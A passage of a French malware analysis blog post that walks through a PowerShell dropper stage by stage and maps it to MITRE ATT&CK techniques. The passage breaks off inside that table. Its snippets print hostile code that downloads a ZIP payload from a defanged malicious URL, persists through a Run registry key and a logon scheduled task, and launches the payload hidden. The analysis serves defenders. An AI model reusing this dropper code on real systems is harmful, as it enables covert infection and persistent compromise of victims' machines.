type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]Le code ci-dessous en illustre le fonctionnement\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<code>$rmrnmjv_xowrzfw_ergg = 'https:\/\/hailmeinc.com\/bkmsiqop[.]zip'<br \/>\n$kayptkrgh_cebx_ytc_ist45mlz = <span style=\"color: #008000;\">\"$env:TEMP\\metvtbg3_zpd_ptred.zip\"<\/span><br \/>\n$ybhjmpx_thul7yx6q361p4hxk = $kayptkrgh_cebx_ytc_ist45mlz + <span style=\"color: #008000;\">\".tmp\"<\/span><\/code><\/p>\n<p><code>$minValidBytes = <span style=\"color: #0000ff;\">10240<\/span><br \/>\n$maxAttempts = <span style=\"color: #0000ff;\">4<\/span><br \/>\n$totalTimeoutSec = <span style=\"color: #0000ff;\">320<\/span><\/code><\/p>\n<p><code><strong><span style=\"color: #0000ff;\">for<\/span><\/strong> ($attempt = <span style=\"color: #0000ff;\">0<\/span>; $attempt -lt $maxAttempts; $attempt++) {<\/code><\/p>\n<p><code><strong><span style=\"color: #0000ff;\">    if<\/span><\/strong> ($attempt -le <span style=\"color: #0000ff;\">2<\/span>) {<br \/>\n$handler = <span style=\"color: #333399;\">New-Object System<span style=\"color: #000000;\">.<\/span>Net<span style=\"color: #000000;\">.<\/span>Http<span style=\"color: #000000;\">.<\/span>HttpClientHandler<\/span><br \/>\n$<span style=\"color: #333399;\">handler<\/span>.<span style=\"color: #333399;\">AutomaticDecompression<\/span> = [<span style=\"color: #333399;\">System<\/span>.<span style=\"color: #333399;\">Net<\/span>.<span style=\"color: #333399;\">DecompressionMethods<\/span>]::<span style=\"color: #333399;\">GZip<\/span> -bor [<span style=\"color: #333399;\">System<\/span>.<span style=\"color: #333399;\">Net<\/span>.<span style=\"color: #333399;\">DecompressionMethods<\/span>]::<span style=\"color: #333399;\">Deflate<\/span><\/code><\/p>\n<p><code>        $client = <span style=\"color: #333399;\">New-Object System<\/span>.<span style=\"color: #333399;\">Net<\/span>.<span style=\"color: #333399;\">Http<\/span>.<span style=\"color: #333399;\">HttpClient<\/span>($handler)<br \/>\n$<span style=\"color: #333399;\">client<\/span>.<span style=\"color: #333399;\">Timeout<\/span> = [<span style=\"color: #333399;\">TimeSpan<\/span>]::<span style=\"color: #333399;\">FromSeconds<\/span>($totalTimeoutSec)<\/code><\/p>\n<p><code>        $<span style=\"color: #333399;\">client<\/span>.<span style=\"color: #333399;\">DefaultRequestHeaders<\/span>.<span style=\"color: #333399;\">Add<\/span>(<span style=\"color: #008000;\">\"User-Agent\"<\/span>, <span style=\"color: #008000;\">\"Mozilla\/5.0\"<\/span>)<br \/>\n$response = $<span style=\"color: #333399;\">client<\/span>.<span style=\"color: #333399;\">GetAsync<\/span>($rmrnmjv_xowrzfw_ergg).Result<\/code><\/p>\n<p><code>        $stream = $<span style=\"color: #333399;\">response<\/span>.<span style=\"color: #333399;\">Content<\/span>.<span style=\"color: #333399;\">ReadAsStreamAsync<\/span>().Result<br \/>\n$fs = [<span style=\"color: #333399;\">System<\/span>.<span style=\"color: #333399;\">IO<\/span>.<span style=\"color: #333399;\">File<\/span>]::<span style=\"color: #333399;\">Create<\/span>($ybhjmpx_thul7yx6q361p4hxk)<\/code><\/p>\n<p><code>        $<span style=\"color: #333399;\">stream<\/span>.<span style=\"color: #333399;\">CopyTo<\/span>($fs)<\/code><\/p>\n<p><code>        $<span style=\"color: #333399;\">fs<\/span>.<span style=\"color: #333399;\">Close<\/span>()<br \/>\n$<span style=\"color: #333399;\">stream<\/span>.<span style=\"color: #333399;\">Close<\/span>()<br \/>\n$<span style=\"color: #333399;\">client<\/span>.<span style=\"color: #333399;\">Dispose<\/span>()<br \/>\n}<br \/>\n<strong><span style=\"color: #0000ff;\">else<\/span><\/strong> {<br \/>\n$progressPreference = '<span style=\"color: #333399;\">SilentlyContinue<\/span>'<\/code><\/p>\n<p><code><span style=\"color: #333399;\">        Invoke-WebRequest -Uri<\/span> $rmrnmjv_xowrzfw_ergg `<br \/>\n<span style=\"color: #333399;\">-OutFile<\/span> $ybhjmpx_thul7yx6q361p4hxk `<br \/>\n<span style=\"color: #333399;\">-UserAgent<\/span> <span style=\"color: #008000;\">\"Mozilla\/5.0 (Windows NT 10.0; Win64; x64)\"<\/span> `<br \/>\n<span style=\"color: #333399;\">-UseBasicParsing<\/span> `<br \/>\n<span style=\"color: #333399;\">-TimeoutSec<\/span> $totalTimeoutSec `<br \/>\n<span style=\"color: #333399;\">-MaximumRedirection<\/span> <span style=\"color: #0000ff;\">5<\/span><br \/>\n}<br \/>\n<strong><span style=\"color: #0000ff;\">if<\/span><\/strong> (<span style=\"color: #333399;\">Test-Path<\/span> $ybhjmpx_thul7yx6q361p4hxk) {<br \/>\n$fileInfo = <span style=\"color: #333399;\">Get-Item<\/span> $ybhjmpx_thul7yx6q361p4hxk<\/code><\/p>\n<p><code><strong><span style=\"color: #0000ff;\">        if<\/span><\/strong> ($<span style=\"color: #333399;\">fileInfo<\/span>.<span style=\"color: #333399;\">Length<\/span> -ge $minValidBytes) {<br \/>\n<span style=\"color: #333399;\">Move-Item<\/span> $ybhjmpx_thul7yx6q361p4hxk $kayptkrgh_cebx_ytc_ist45mlz <span style=\"color: #333399;\">-Force<\/span><br \/>\n<strong><span style=\"color: #0000ff;\">break<\/span><\/strong><br \/>\n}<br \/>\n}<br \/>\n}<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]<\/p>\n<h3>D\u00e9ploiement<\/h3>\n<p>Apr\u00e8s t\u00e9l\u00e9chargement, le dropper tente de d\u00e9ployer la charge dans plusieurs dossiers possibles sur le syst\u00e8me.<\/p>\n<p>Il d\u00e9finit d\u2019abord une liste de dossiers candidats, tous situ\u00e9s dans le profil de l\u2019utilisateur. En th\u00e9orie, il ne devrait donc pas y avoir de probl\u00e8me d\u2019\u00e9criture.[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<code>$folders = @(<br \/>\n<span style=\"color: #008000;\">\"$env:LOCALAPPDATA\"<\/span>,<br \/>\n<span style=\"color: #008000;\">\"$env:APPDATA\"<\/span>,<br \/>\n<span style=\"color: #008000;\">\"$env:TEMP\"<\/span>,<br \/>\n<span style=\"color: #008000;\">\"$env:USERPROFILE\\AppData\\Local\"<\/span>,<br \/>\n<span style=\"color: #008000;\">\"$env:USERPROFILE\\Documents\"<\/span><br \/>\n)<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]Ensuite, il parcourt chaque dossier pour y extraire l'archive ZIP dans un sous dossier unique puis cacher les fichiers extraits (via les attributs de fichier). En cas de probl\u00e8me, il tente sa chance avec le prochain dossier de la liste.<\/p>\n<h3>Persistance<\/h3>\n<p>Une fois d\u00e9ploy\u00e9, le dropper assure la persistance du payload en programmant le lancement automatique de l\u2019ex\u00e9cutable final au d\u00e9marrage de la session de l'utilisateur. Pour l'identifier, il cherche parmi les fichiers extraits, le premier fichier d'extension <code>.exe<\/code> ou <code>.bat<\/code>.[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<code>$pxtpgmp_mzlpvpwd_djkfv5euf5ym = <span style=\"color: #333399;\">Get-ChildItem -LiteralPath<\/span> $hjczxmu5_ylniricgh5t9o1egfo8v5vx <span style=\"color: #333399;\">-Filter<\/span> <span style=\"color: #008000;\">\"*.exe\"<\/span> <span style=\"color: #333399;\">-Recurse -File -ErrorAction SilentlyContinue | Select-Object -First<\/span> <span style=\"color: #0000ff;\">1<\/span><br \/>\n<strong><span style=\"color: #0000ff;\">if<\/span><\/strong> (-not $pxtpgmp_mzlpvpwd_djkfv5euf5ym) {<br \/>\n$pxtpgmp_mzlpvpwd_djkfv5euf5ym = <span style=\"color: #333399;\">Get-ChildItem -LiteralPath<\/span> $hjczxmu5_ylniricgh5t9o1egfo8v5vx <span style=\"color: #333399;\">-Filter<\/span> <span style=\"color: #008000;\">\"*.bat\"<\/span> <span style=\"color: #333399;\">-Recurse -File -ErrorAction SilentlyContinue | Select-Object -First<\/span> <span style=\"color: #0000ff;\">1<\/span><br \/>\n}<\/code><\/p>\n<p><code>[...]<\/code><\/p>\n<p><code>$dak_byhtc_rbcqve47lftj33h67wvs5mtq = $<span style=\"color: #333399;\">pxtpgmp_mzlpvpwd_djkfv5euf5ym.FullName<\/span><\/code><\/p>\n<p><code>[...]<\/code><\/p>\n<p><code>$buodgdzpc_abmemxc_jnqbazymol7m1gv = 'HKCU:<span style=\"color: #333399;\">\\Software\\Microsoft\\Windows\\CurrentVersion\\Run<\/span>'<br \/>\n$ztiby6_lsofozr7hfvcxz19dwufszdig2hn = <span style=\"color: #008000;\">\"ivni9_sauqw9_csq_jzdfo${var_map['unique_tag']}\"<\/span><br \/>\n$dhri_qrzloz2_mcf_abwapumflh = '\"' + $dak_byhtc_rbcqve47lftj33h67wvs5mtq + '\"'<br \/>\n<strong><span style=\"color: #0000ff;\">try<\/span><\/strong> {<br \/>\n<span style=\"color: #333399;\">Set-ItemProperty -Path<\/span> $buodgdzpc_abmemxc_jnqbazymol7m1gv <span style=\"color: #333399;\">-Name<\/span> $ztiby6_lsofozr7hfvcxz19dwufszdig2hn <span style=\"color: #333399;\">-Value<\/span> $dhri_qrzloz2_mcf_abwapumflh <span style=\"color: #333399;\">-ErrorAction Stop<\/span><\/code><\/p>\n<p><code>[...]<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]Voici un aper\u00e7u de la clef registre cr\u00e9\u00e9e pour le cas sp\u00e9cifique du payload de cette chaine d'attaque\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_single_image image=\"774030\" img_size=\"large\" alignment=\"center\" css=\"\" qode_css_animation=\"\"][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]Si cette m\u00e9thode \u00e9choue, le dropper tente un <strong>fallback<\/strong> avec une t\u00e2che planifi\u00e9e\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<code>$tqkek_oxp_oxwi_rahjn7lojrz1bwd5 = <span style=\"color: #008000;\">\"ivni9_sauqw9_csq_jzdfo${var_map['unique_tag']}\"<\/span><\/code><\/p>\n<p><code>[...]<\/code><\/p>\n<p><code>$taskTr = '\"' + $dak_byhtc_rbcqve47lftj33h67wvs5mtq + '\"'<br \/>\n$taskCreated = $<span style=\"color: #0000ff;\">false<\/span><br \/>\n<strong><span style=\"color: #0000ff;\">try<\/span><\/strong> {<br \/>\n$<span style=\"color: #0000ff;\"><strong>null<\/strong><\/span> = &amp; schtasks \/create \/tn $tqkek_oxp_oxwi_rahjn7lojrz1bwd5 \/tr $taskTr \/sc onlogon \/f \/rl limited<br \/>\n<span style=\"color: #0000ff;\"><strong>if<\/strong><\/span> ($LASTEXITCODE -eq <span style=\"color: #0000ff;\">0<\/span>) { $taskCreated = $<span style=\"color: #0000ff;\">true<\/span>; $utl_iawknluwgoky6rb0nvzt5h0yj6y4s = $<span style=\"color: #0000ff;\">true<\/span> }<br \/>\n} <strong><span style=\"color: #0000ff;\">catch<\/span><\/strong> { }<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]Ici, il cr\u00e9e une t\u00e2che planifi\u00e9e nomm\u00e9e <code>ivni9_sauqw9_csq_jzdfo<\/code> qui ex\u00e9cute le payload \u00e0 chaque ouverture de session de l\u2019utilisateur.<\/p>\n<p>La persistance repose sur le registre et les t\u00e2ches planifi\u00e9es. Si les deux \u00e9chouent, le dropper n\u2019essaie aucun autre m\u00e9canisme et le payload ne survivra pas aux fermetures de session Windows.<\/p>\n<h3>Ex\u00e9cution de la charge<\/h3>\n<p>Le dropper lance le payload final, soit directement via son ex\u00e9cutable ou son script de d\u00e9marrage. L\u2019ex\u00e9cution se fait en arri\u00e8re-plan et sans interaction avec l\u2019utilisateur.[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<code>$dhri_qrzloz2_mcf_abwapumflh = '\"' + $dak_byhtc_rbcqve47lftj33h67wvs5mtq + '\"'<br \/>\n<span style=\"color: #333399;\">Start-Process -FilePath<\/span> $dak_byhtc_rbcqve47lftj33h67wvs5mtq <span style=\"color: #333399;\">-WindowStyle Hidden<\/span><\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]<\/p>\n<h3>R\u00e9capitulatif de la phase d'ex\u00e9cution<\/h3>\n<p>Ce script PowerShell correspond \u00e0 un dropper classique, structur\u00e9 autour de plusieurs \u00e9tapes bien d\u00e9finies :<\/p>\n<ul>\n<li>Reconnaissance du syst\u00e8me,<\/li>\n<li>T\u00e9l\u00e9chargement de la charge,<\/li>\n<li>D\u00e9ploiement,<\/li>\n<li>Tentative de persistance,<\/li>\n<li>Ex\u00e9cution du payload.<\/li>\n<\/ul>\n<p>L\u2019analyse montre une logique simple mais efficace, avec des m\u00e9canismes de repli (multiples dossiers, m\u00e9thodes de persistance alternatives) permettant d\u2019augmenter les chances de succ\u00e8s. Le script int\u00e8gre \u00e9galement un syst\u00e8me de reporting, offrant \u00e0 l\u2019attaquant une visibilit\u00e9 sur le d\u00e9roulement de chaque \u00e9tape.<\/p>\n<p>Dans un prochain article, nous analyserons la charge finale d\u00e9pos\u00e9e et ex\u00e9cut\u00e9e chez la victime.[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]<\/p>\n<h2>Mapping des techniques observ\u00e9es (MITRE ATT&amp;CK)<\/h2>\n<div class=\"ntb_table_wrapper ninja_table_builder_instance_1\"\n     id='ninja_table_builder_774036'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_1\"\n     style=\"\n     max-height:2000px;\n     max-width: 745px;margin-right: auto;\">\n    <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_774036 ntb_774036\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><tbody class=\"tbody\"><tr class=\"desktop-view tr_class_6221927\" id=\"tr_id_6221927\" data-draggable=\"true\" style=\"background: rgb(221, 221, 221);\"><td id=\"td_id_27563885\" class=\"td_class_27563885 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_27563885\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_16\" spellcheck=\"false\"><strong>Tactique<\/strong><\/span><\/div><\/div><\/div><\/td><td id=\"td_id_24116021\" class=\"td_class_24116021 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_24116021\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_18\" spellcheck=\"false\"><strong>Technique<\/strong><\/span><\/div><\/div><\/div><\/td><td id=\"td_id_10558302\" class=\"td_class_10558302 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_10558302\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_19\" spellcheck=\"false\"><strong>Description<\/strong><\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_5918768\" id=\"tr_id_5918768\" data-draggable=\"true\" style=\"background: rgb(255, 255, 255);\"><td id=\"td_id_21441264\" class=\"td_class_21441264 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_21441264\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_20\" spellcheck=\"false\">Execution<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_69485873\" class=\"td_class_69485873 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_69485873\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_21\" spellcheck=\"false\"><a class=\"external-link\" href=\"https:\/\/attack.mitre.org\/techniques\/T1204\/004\/\" target=\"_blank\" rel=\"noopener\" data-mce-selected=\"inline-boundary\">T1204.004<\/a><\/span><\/div><\/div><\/div><\/td><td id=\"td_id_42701074\" class=\"td_class_42701074 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_42701074\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_22\" spellcheck=\"false\">User Execution: Malicious Copy and Paste<\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_6818148\" id=\"tr_id_6818148\" data-draggable=\"true\" style=\"\" draggable=\"false\"><td id=\"td_id_77802007\" class=\"td_class_77802007 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_77802007\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_23\" spellcheck=\"false\">Execution<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_88192375\" class=\"td_class_88192375 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_88192375\"><div class=\"single-item other-item\" data-draggable=\"true\" draggable=\"false\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_24\" spellcheck=\"false\"><a class=\"external-link\" draggable=\"false\" href=\"https:\/\/attack.mitre.org\/techniques\/T1059\/001\/\" target=\"_blank\" rel=\"noopener\" data-mce-selected=\"inline-boundary\">T1059.001<\/a><\/span><\/div><\/div><\/div><\/td><td id=\"td_id_74588679\" class=\"td_class_74588679 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_74588679\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_25\" spellcheck=\"false\">Command and Scripting Interpreter: PowerShell <\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_8598078\" id=\"tr_id_8598078\" data-draggable=\"true\" style=\"background: rgb(255, 255, 255);\"><td id=\"td_id_69534423\" class=\"td_class_69534423 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_69534423\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_26\" spellcheck=\"false\">Persistence, Privilege Escalation<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_17239289\" class=\"td_class_17239289 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_17239289\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_27\" spellcheck=\"false\"><a class=\"external-link\" href=\"https:\/\/attack.mitre.org\/techniques\/T1547\/001\/\" target=\"_blank\" rel=\"noopener\" data-mce-selected=\"inline-boundary\">T1547.001<\/a><\/span><\/div><\/div><\/div><\/td><td id=\"td_id_82521673\" class=\"td_class_82521673 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_82521673\"><div class=\"single-item other-item\" data-draggable=\"true\" draggable=\"false\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_28\" spellcheck=\"false\">Boot or Logon Autostart Execution: Registry Run Keys \/ Startup Folder<\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_4015110\" id=\"tr_id_4015110\" data-draggable=\"true\" style=\"\"><td id=\"td_id_52917687\" class=\"td_class_52917687 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_52917687\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_29\" spellcheck=\"false\">Persistence, Execution<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_91831426\" class=\"td_class_91831426 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_91831426\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_30\" spellcheck=\"false\"><a class=\"external-link\" href=\"https:\/\/attack.mitre.org\/techniques\/T1053\/005\/\" target=\"_blank\" rel=\"noopener\" data-mce-selected=\"inline-boundary\">T1053.005<\/a><\/span><\/div><\/div><\/div><\/td><td id=\"td_id_76754973\" class=\"td_class_76754973 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_76754973\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_31\" spellcheck=\"false\">Scheduled Task\/Job: Scheduled Task<\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_6495636\" id=\"tr_id_6495636\" data-draggable=\"true\" style=\"background: rgb(255, 255, 255);\" draggable=\"false\"><td id=\"td_id_40285123\" class=\"td_class_40285123 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_40285123\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; 